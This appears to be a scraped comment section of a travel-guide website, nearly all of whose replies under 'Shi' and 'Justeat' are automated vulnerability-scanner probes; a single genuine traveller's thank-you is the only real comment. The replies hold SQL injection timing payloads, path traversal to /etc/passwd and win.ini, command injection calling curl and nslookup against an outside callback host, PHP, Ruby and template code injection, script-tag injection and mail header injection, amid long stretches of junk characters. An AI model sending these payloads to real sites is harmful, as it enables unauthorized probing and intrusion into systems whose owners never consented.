\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Shi
";print(md5(31337));$a="
re: Shi
'"
re: Shi
WEB-INF/web.xml
re: Shi
${@print(md5(31337))}
re: Shi
<!--
re: Shi
WEB-INF\web.xml
re: Shi
${@print(md5(31337))}\
re: Shi
'.print(md5(31337)).'
re: Shi
1PX8IHZXX0
re: Shi
response.write(9298988*9075397)
re: Shi
'+response.write(9298988*9075397)+'
re: Shi
"+response.write(9298988*9075397)+"
re: Shi
../../../../../../../../../../../../../../etc/passwd
re: Shi
../../../../../../../../../../../../../../windows/win.ini
re: Shi
<esi:include src="http://bxss.me/rpb.png"/>
re: Shi
file:///etc/passwd
re: Shi
${9999972+10000265}
re: Shi
../
re: Shi
)
re: Shi
!(()&&!|*|*|
re: Shi
redirtest.acx
re: Shi
^(#$!@#$)(()))******
re: Shi
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Shi
echo jlglew$()\ dyyyxe\nz^xyu||a #' &echo jlglew$()\ dyyyxe\nz^xyu||a #|" &echo jlglew$()\ dyyyxe\nz^xyu||a #
re: Shi
'.gethostbyname(lc('hitzb'.'pnjekrkr73260.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(66).chr(105).chr(90).'
re: Shi
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Shi
&echo mwlsra$()\ uigajv\nz^xyu||a #' &echo mwlsra$()\ uigajv\nz^xyu||a #|" &echo mwlsra$()\ uigajv\nz^xyu||a #
re: Shi
".gethostbyname(lc("hitla"."yzxafprp4876a.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(88).chr(100).chr(68)."
re: Shi
/etc/shells
re: Shi
|echo aowdrw$()\ wpmybz\nz^xyu||a #' |echo aowdrw$()\ wpmybz\nz^xyu||a #|" |echo aowdrw$()\ wpmybz\nz^xyu||a #
re: Shi
gethostbyname(lc('hitfa'.'njbxkgpo335a4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(82).chr(100).chr(78)
re: Shi
expr 9000649422 - 935132
re: Shi
../../../../../../../../../../../../../../etc/shells
re: Shi
(nslookup -q=cname hitjrhnzveihw30491.bxss.me||curl hitjrhnzveihw30491.bxss.me))
re: Shi
c:/windows/win.ini
re: Shi
$(nslookup -q=cname hitvsqczcfsnk4b99b.bxss.me||curl hitvsqczcfsnk4b99b.bxss.me)
re: Shi
bxss.me
re: Shi
&nslookup -q=cname hithxdejfrrxu042ba.bxss.me&'\"`0&nslookup -q=cname hithxdejfrrxu042ba.bxss.me&`'
re: Shi
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Shi
Http://bxss.me/t/fit.txt
re: Shi
&(nslookup -q=cname hitwxhpezjkxk8fb57.bxss.me||curl hitwxhpezjkxk8fb57.bxss.me)&'\"`0&(nslookup -q=cname hitwxhpezjkxk8fb57.bxss.me||curl hitwxhpezjkxk8fb57.bxss.me)&`'
re: Shi
http://bxss.me/t/fit.txt?.jpg
re: Shi
|(nslookup -q=cname hitlzoqvicymw1ea90.bxss.me||curl hitlzoqvicymw1ea90.bxss.me)
re: Shi
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Shi
`(nslookup -q=cname hitxratrnmgtv8ddbe.bxss.me||curl hitxratrnmgtv8ddbe.bxss.me)`
re: Shi
';print(md5(31337));$a='
re: Shi
;(nslookup -q=cname hithamphboxcxf7c0e.bxss.me||curl hithamphboxcxf7c0e.bxss.me)|(nslookup -q=cname hithamphboxcxf7c0e.bxss.me||curl hithamphboxcxf7c0e.bxss.me)&(nslookup -q=cname hithamphboxcxf7c0e.bxss.me||curl hithamphboxcxf7c0e.bxss.me)
re: Shi
";print(md5(31337));$a="
re: Shi
'"()
re: Shi
|(nslookup${IFS}-q${IFS}cname${IFS}hithywgcycumvea5c5.bxss.me||curl${IFS}hithywgcycumvea5c5.bxss.me)
re: Shi
${@print(md5(31337))}
re: Shi
'&&sleep(27*1000)*tkjbnq&&'
re: Shi
&(nslookup${IFS}-q${IFS}cname${IFS}hitubuivziyped5e79.bxss.me||curl${IFS}hitubuivziyped5e79.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitubuivziyped5e79.bxss.me||curl${IFS}hitubuivziyped5e79.bxss.me)&`'
re: Shi
"&&sleep(27*1000)*zfpvow&&"
re: Shi
${@print(md5(31337))}\
re: Shi
'||sleep(27*1000)*gwyswf||'
re: Shi
'.print(md5(31337)).'
re: Shi
"||sleep(27*1000)*dsmgps||"
re: Shi
HttP://bxss.me/t/xss.html?%00
re: Shi
bxss.me/t/xss.html?%00
re: Shi
"+"A".concat(70-3).concat(22*4).concat(118).concat(67).concat(105).concat(68)+(require"socket"
Socket.gethostbyname("hitrf"+"gdfpmhgd2b6e3.bxss.me.")[3].to_s)+"
re: Shi
replies
re: Shi
'+'A'.concat(70-3).concat(22*4).concat(118).concat(79).concat(116).concat(80)+(require'socket'
Socket.gethostbyname('hitxs'+'rpnuspda18f5e.bxss.me.')[3].to_s)+'
re: Shi
replies�
re: Shi
'A'.concat(70-3).concat(22*4).concat(104).concat(67).concat(109).concat(66)+(require'socket'
Socket.gethostbyname('hitpr'+'wodkhdsx21fca.bxss.me.')[3].to_s)
re: Shi
replies/.
re: Shi
'"
re: Shi
<!--
re: Shi
'"()&%<zzz><ScRiPt >kfRn(9461)</ScRiPt>
re: Shi
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitrqmfeloawn5108c.bxss.me")}}
re: Shi
'"()&%<zzz><ScRiPt >kfRn(9031)</ScRiPt>
re: Shi
9753718
re: Shi
EHm1lcnh
re: Shi
*1
re: Shi
*1
re: Shi
*1
re: Shi
*1
re: Shi
-1 OR 5*5=25 --
re: Shi
-1 OR 5*5=26 --
re: Shi
-1 OR 5*5=25
re: Shi
-1 OR 5*5=26
re: Shi
*if(now()=sysdate(),sleep(15),0)
re: Shi
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Shi
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Shi
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Shi
-1; waitfor delay '0:0:15' --
re: Shi
-1); waitfor delay '0:0:15' --
re: Shi
-1 waitfor delay '0:0:15' --
re: Shi
1q5lmMBv'; waitfor delay '0:0:15' --
re: Shi
-1 OR 45=(SELECT 45 FROM PG_SLEEP(15))--
re: Shi
-1) OR 142=(SELECT 142 FROM PG_SLEEP(15))--
re: Shi
-1)) OR 698=(SELECT 698 FROM PG_SLEEP(15))--
re: Shi
g9kU7szV' OR 305=(SELECT 305 FROM PG_SLEEP(15))--
re: Shi
EoaQQr0F') OR 632=(SELECT 632 FROM PG_SLEEP(15))--
re: Shi
GKlqnmNH')) OR 878=(SELECT 878 FROM PG_SLEEP(15))--
re: Shi
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Shi
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Shi
'||(select 1 from (select pg_sleep(15))x)||'
re: Shi
''||(select 1 from (select pg_sleep(15))x)||''
re: Shi
'"
re: Shi
@@vWgBf
re: Shi
(select 198766*667891)
re: Shi
(select 198766*667891 from DUAL)
Thank you for building this Saito-san. Can’t wait my next month trip using this guide
re: Justeat
PxKAZjOr
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
1*
re: Justeat
-1 OR 2+767-767-1=0+0+0+1
re: Justeat
-1 OR 3+767-767-1=0+0+0+1
re: Justeat
if(now()=sysdate(),sleep(15),0)
re: Justeat
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Justeat
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Justeat
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Justeat
-1; waitfor delay '0:0:15' --
re: Justeat
-1); waitfor delay '0:0:15' --
re: Justeat
1 waitfor delay '0:0:15' --
re: Justeat
W6c0y4jR'; waitfor delay '0:0:15' --
re: Justeat
-5 OR 70=(SELECT 70 FROM PG_SLEEP(15))--
re: Justeat
-5) OR 323=(SELECT 323 FROM PG_SLEEP(15))--
re: Justeat
-1)) OR 470=(SELECT 470 FROM PG_SLEEP(15))--
re: Justeat
0bcreVfv' OR 893=(SELECT 893 FROM PG_SLEEP(15))--
re: Justeat
mmLUNLFZ') OR 881=(SELECT 881 FROM PG_SLEEP(15))--
re: Justeat
7q0LSU7N')) OR 383=(SELECT 383 FROM PG_SLEEP(15))--
re: Justeat
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Justeat
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Justeat
'||(select 1 from (select pg_sleep(15))x)||'
re: Justeat
''||(select 1 from (select pg_sleep(15))x)||''
re: Justeat
1'"
re: Justeat
@@VCu9H
re: Justeat
1Do5YhIzbrO
re: Justeat
response.write(9000582*9820965)
re: Justeat
'+response.write(9000582*9820965)+'
re: Justeat
"+response.write(9000582*9820965)+"
re: Justeat
../../../../../../../../../../../../../../etc/passwd
re: Justeat
../../../../../../../../../../../../../../windows/win.ini
re: Justeat
file:///etc/passwd
re: Justeat
../../../../../../../../../../../../../../../proc/version
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Justeat
../../../../../../../../../../etc/passwd%00.jpg
re: Justeat
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Justeat
%0abcc:074625.67-22295.67.b4701.19990.2@bxss.me
re: Justeat
to@example.com>%0d%0abcc:074625.67-22296.67.b4701.19990.2@bxss.me
re: Justeat
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Justeat
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Justeat
echo jkpqkt$()\ gesnqn\nz^xyu||a #' &echo jkpqkt$()\ gesnqn\nz^xyu||a #|" &echo jkpqkt$()\ gesnqn\nz^xyu||a #
re: Justeat
/etc/passwd
re: Justeat
&echo xxrzky$()\ mdgfcm\nz^xyu||a #' &echo xxrzky$()\ mdgfcm\nz^xyu||a #|" &echo xxrzky$()\ mdgfcm\nz^xyu||a #
re: Justeat
%2fetc%2fpasswd
re: Justeat
<esi:include src="http://bxss.me/rpb.png"/>
re: Justeat
|echo kdqgwl$()\ fzrdnh\nz^xyu||a #' |echo kdqgwl$()\ fzrdnh\nz^xyu||a #|" |echo kdqgwl$()\ fzrdnh\nz^xyu||a #
re: Justeat
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Justeat
(nslookup hitfeqldokwlr4e5d1.bxss.me||perl -e "gethostbyname('hitfeqldokwlr4e5d1.bxss.me')")
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Justeat
$(nslookup hitfnveldzknp80c79.bxss.me||perl -e "gethostbyname('hitfnveldzknp80c79.bxss.me')")
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Justeat
${10000071+10000229}
re: Justeat
&nslookup hitdklbdeygzg1d40c.bxss.me&'\"`0&nslookup hitdklbdeygzg1d40c.bxss.me&`'
re: Justeat
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Justeat
&(nslookup hitcaowzcotiu4ea51.bxss.me||perl -e "gethostbyname('hitcaowzcotiu4ea51.bxss.me')")&'\"`0&(nslookup hitcaowzcotiu4ea51.bxss.me||perl -e "gethostbyname('hitcaowzcotiu4ea51.bxss.me')")&`'
re: Justeat
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Justeat
|(nslookup hittpnrmlhlpldcaa7.bxss.me||perl -e "gethostbyname('hittpnrmlhlpldcaa7.bxss.me')")
re: Justeat
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Justeat
`(nslookup hitbgsrkasujrcc03c.bxss.me||perl -e "gethostbyname('hitbgsrkasujrcc03c.bxss.me')")`
re: Justeat
file:///etc/passwd
re: Justeat
;(nslookup hitwmvpspchezbdb1c.bxss.me||perl -e "gethostbyname('hitwmvpspchezbdb1c.bxss.me')")|(nslookup hitwmvpspchezbdb1c.bxss.me||perl -e "gethostbyname('hitwmvpspchezbdb1c.bxss.me')")&(nslookup hitwmvpspchezbdb1c.bxss.me||perl -e "gethostbyname('hitwmvpspchezbdb1c.bxss.me')")
re: Justeat
/\../\../\../\../\../\../\../etc/passwd
re: Justeat
/WEB-INF/web.xml
re: Justeat
C:\WINDOWS\system32\drivers\etc\hosts
re: Justeat
)
re: Justeat
../../../../../../../../../../windows/win.ini%00.jpg
re: Justeat
!(()&&!|*|*|
re: Justeat
/../../../../../../../../../../boot.ini
re: Justeat
^(#$!@#$)(()))******
re: Justeat
'.gethostbyname(lc('hitvc'.'owgqcmkya1603.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(76).chr(108).chr(85).'
re: Justeat
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Justeat
".gethostbyname(lc("hitkb"."iabfroge714e8.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(88).chr(98).chr(88)."
re: Justeat
..\..\..\..\..\..\..\..\windows\win.ini
re: Justeat
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Justeat
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Justeat
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Justeat
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Justeat
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Justeat
Http://bxss.me/t/fit.txt
re: Justeat
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Justeat
http://bxss.me/t/fit.txt%3F.jpg
re: Justeat
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Justeat
/etc/shells
re: Justeat
WEB-INF/web.xml
re: Justeat
c:/windows/win.ini
re: Justeat
HttP://bxss.me/t/xss.html?%00
re: Justeat
"+"A".concat(70-3).concat(22*4).concat(110).concat(71).concat(121).concat(66)+(require"socket"
Socket.gethostbyname("hitqc"+"apauhutx74b24.bxss.me.")[3].to_s)+"
re: Justeat
WEB-INF\web.xml
re: Justeat
bxss.me
re: Justeat
bxss.me/t/xss.html?%00
re: Justeat
'+'A'.concat(70-3).concat(22*4).concat(108).concat(67).concat(112).concat(84)+(require'socket'
Socket.gethostbyname('hitqb'+'jnnaxtjkbb888.bxss.me.')[3].to_s)+'
re: Justeat
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Justeat
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Justeat
';print(md5(31337));$a='
re: Justeat
'"
re: Justeat
";print(md5(31337));$a="
re: Justeat
<!--
re: Justeat
${@print(md5(31337))}
re: Justeat
${@print(md5(31337))}\
re: Justeat
'.print(md5(31337)).'
re: Justeat
1IDYNVTEV0
re: Justeat
response.write(9218000*9257740)
re: Justeat
